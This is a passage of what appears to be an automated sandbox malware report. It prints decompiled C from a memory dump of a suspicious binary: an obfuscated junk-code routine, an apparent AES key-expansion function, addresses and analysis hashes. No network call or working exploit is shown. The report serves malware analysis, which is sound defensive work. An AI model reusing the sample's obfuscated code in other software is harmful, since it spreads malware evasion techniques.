                  					_pop( *0x16ef45d8);
                  					_t76 = _t76 - 1;
                  					asm("adc ch, [0x897790e0]");
                  					asm("ror byte [0xa8c4a800], 0xbc");
                  					 *0x16ef45d8 =  *0x16ef45d8 + 0x470c16ef;
                  					 *0x2bc09e3f = _t46;
                  					asm("adc cl, 0x63");
                  					 *0xc4a80082 =  *0xc4a80082 >> 0xcf;
                  					 *0xef45d8a8 =  *0xef45d8a8 >> 0xd3;
                  					_t61 =  *0xbc121f16;
                  					 *0xa10f9e2b =  *0xa10f9e2b - _t46;
                  					 *0x8840ecb2 =  *0x8840ecb2 ^ _t46;
                  					asm("sbb ebp, [0xe24b16ef]");
                  					asm("rcr dword [0x395fc2cc], 0x7");
                  					 *0x941616d2 =  *0x941616d2 << 0xb2;
                  					_push( *0xdec32e33);
                  					asm("adc [0xe0cc32c1], esp");
                  					asm("adc ch, 0xa8");
                  					asm("rcl dword [0xe26216ef], 0x79");
                  					_t39 =  *0xd8a8c4a8;
                  					 *0xd8a8c4a8 = _t46 - 1;
                  					_t60 = _t58 |  *0xf0cc319f |  *0xd6b616ef;
                  				} while (0x395fc0d6 < 0);
                  				 *0x52173a78 =  *0x52173a78 >> 0xcb;
                  				_t32 = _t26 + 1;
                  				_push(_t32);
                  				 *0xef45d88d =  *0xef45d88d ^ _t60;
                  				return _t32 | 0x00000016;
                  			}






















                  0x0116236a
                  0x0116236a
                  0x0116236a
                  0x0116236a
                  0x0116236a
                  0x0116236b
                  0x0116236d
                  0x0116236d
                  0x0116236d
                  0x0116236d
                  0x0116236d
                  0x0116236d
                  0x0116236d
                  0x01162370
                  0x0116237e
                  0x01162385
                  0x0116238b
                  0x01162391
                  0x01162392
                  0x01162395
                  0x0116239a
                  0x0116239a
                  0x011623a3
                  0x011623af
                  0x011623b8
                  0x011623be
                  0x011623c4
                  0x011623ca
                  0x011623d0
                  0x011623d6
                  0x011623d7
                  0x011623dd
                  0x011623e0
                  0x011623e6
                  0x011623e6
                  0x011623f2
                  0x011623f8
                  0x01162416
                  0x0116241d
                  0x0116241e
                  0x0116241f
                  0x01162420
                  0x0116242d
                  0x01162436
                  0x01162448
                  0x01162449
                  0x01162455
                  0x01162456
                  0x01162461
                  0x01162473
                  0x01162479
                  0x01162480
                  0x0116248c
                  0x01162492
                  0x0116249b
                  0x011624a2
                  0x011624a8
                  0x011624ae
                  0x011624bb
                  0x011624c1
                  0x011624c7
                  0x011624cd
                  0x011624d3
                  0x011624d9
                  0x011624df
                  0x011624ea
                  0x011624eb
                  0x011624eb
                  0x011624fe
                  0x01162505
                  0x01162511
                  0x01162518
                  0x0116251e
                  0x01162524
                  0x0116252b
                  0x0116252e
                  0x01162535
                  0x0116253b
                  0x01162542
                  0x01162548
                  0x0116254e
                  0x01162552
                  0x01162574
                  0x0116257a
                  0x01162580
                  0x01162581
                  0x01162584
                  0x0116258b
                  0x01162591
                  0x01162598
                  0x01162598
                  0x011625aa
                  0x011625b8
                  0x011625be
                  0x011625c3
                  0x011625d0
                  0x011625d6
                  0x011625e1
                  0x011625ff
                  0x01162602
                  0x0116260e
                  0x01162611
                  0x01162612
                  0x01162613
                  0x01162620
                  0x01162623
                  0x0116262a
                  0x01162630
                  0x01162631
                  0x01162637
                  0x0116263e
                  0x01162644
                  0x0116265c
                  0x0116265f
                  0x01162666
                  0x0116266d
                  0x01162673
                  0x01162679
                  0x0116267f
                  0x0116268b
                  0x01162693
                  0x0116269a
                  0x011626a0
                  0x011626a6
                  0x011626a9
                  0x011626b6
                  0x011626b6
                  0x011626bd
                  0x011626bd
                  0x011626c9
                  0x011626d0
                  0x011626d1
                  0x011626d2
                  0x011626da

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1b5df0c3c5d8e47dd28f21c69f01f0dd5c786d84d1ea4724bdba55894e0f6b4b
                  • Instruction ID: b0677fab5c3dae04faae674c45a9b5fc977fa2729d72727f7168b9d0311e4ba3
                  • Opcode Fuzzy Hash: 1b5df0c3c5d8e47dd28f21c69f01f0dd5c786d84d1ea4724bdba55894e0f6b4b
                  • Instruction Fuzzy Hash: 6E810F72809790CFEB05DF78E8AA6463FB6FB86320708478DC9E2561E2C7701466CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E011444C7(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                  				signed int _t66;
                  				signed int* _t69;
                  				signed int* _t81;
                  				signed int _t94;
                  				signed int _t96;
                  				signed int _t106;
                  				signed int _t108;
                  				signed int* _t110;
                  				signed int _t127;
                  				signed int _t129;
                  				signed int _t133;
                  				signed int _t152;
                  				intOrPtr _t171;
                  
                  				_t81 = _a12;
                  				_t110 = _a8;
                  				asm("ror esi, 0x8");
                  				asm("rol eax, 0x8");
                  				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                  				_t66 =  &(_t110[1]);
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                  				asm("ror edi, 0x8");
                  				asm("rol esi, 0x8");
                  				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                  				asm("ror esi, 0x8");
                  				asm("rol ecx, 0x8");
                  				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                  				if(_a16 != 0x100) {
                  					L4:
                  					return _t66 | 0xffffffff;
                  				} else {
                  					_t171 = _a4;
                  					_t69 = 0;
                  					_a12 = 0;
                  					while(1) {
                  						_t152 =  *(_t66 + 0x18);
                  						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                  						_t127 =  *_t66 ^ _t94;
                  						 *(_t66 + 0x1c) = _t94;
                  						_t96 =  *(_t66 + 4) ^ _t127;
                  						 *(_t66 + 0x20) = _t127;
                  						_t129 =  *(_t66 + 8) ^ _t96;
                  						 *(_t66 + 0x24) = _t96;
                  						 *(_t66 + 0x28) = _t129;
                  						if(_t69 == 6) {
                  							break;
                  						}
                  						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                  						_t133 =  *(_t66 + 0x10) ^ _t106;
                  						 *(_t66 + 0x2c) = _t106;
                  						_t108 =  *(_t66 + 0x14) ^ _t133;
                  						 *(_t66 + 0x34) = _t108;
                  						_t69 =  &(_a12[0]);
                  						 *(_t66 + 0x30) = _t133;
                  						 *(_t66 + 0x38) = _t108 ^ _t152;
                  						_t66 = _t66 + 0x20;
                  						_a12 = _t69;
                  						if(_t69 < 7) {
                  							continue;
                  						} else {
                  							goto L4;
                  						}
                  						goto L6;
                  					}
                  					return 0xe;
                  				}
                  				L6:
                  			}
















                  0x011444ca
                  0x011444cf
                  0x011444d7
                  0x011444e0
                  0x011444ea
                  0x011444f1
                  0x011444fa
                  0x01144505
                  0x0114450d
                  0x01144516
                  0x01144521
                  0x01144527
                  0x0114452c
                  0x01144535
                  0x01144540
                  0x01144548
                  0x01144551
                  0x0114455c
                  0x01144564
                  0x0114456d
                  0x01144578
                  0x01144580
                  0x01144589
                  0x01144594
                  0x0114459c
                  0x011445a5
                  0x011445b7
                  0x011445ba
                  0x011446d6
                  0x011446db
                  0x011445c0
                  0x011445c0
                  0x011445c3
                  0x011445c5
                  0x011445c8
                  0x011445c8
                  0x0114462d
                  0x01144632
                  0x01144634
                  0x0114463a
                  0x0114463c
                  0x01144642
                  0x01144644
                  0x01144647
                  0x0114464d
                  0x00000000
                  0x00000000
                  0x011446a9
                  0x011446af
                  0x011446b1
                  0x011446b7
                  0x011446b9
                  0x011446be
                  0x011446bf
                  0x011446c2
                  0x011446c5
                  0x011446c8
                  0x011446ce
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x011446ce
                  0x011446e5
                  0x011446e5
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                  • Instruction ID: 2d3b448c6c8bac16237797a0c5e220535281cd552e8d5a4f56889e72638521ca
                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                  • Instruction Fuzzy Hash: 7E5180B3E14A254BD318CE09CC40631B792FFD8312B5F81BADD199B357CA74E9529A90
                  Uniqueness

                  Uniqueness Score: -1.00%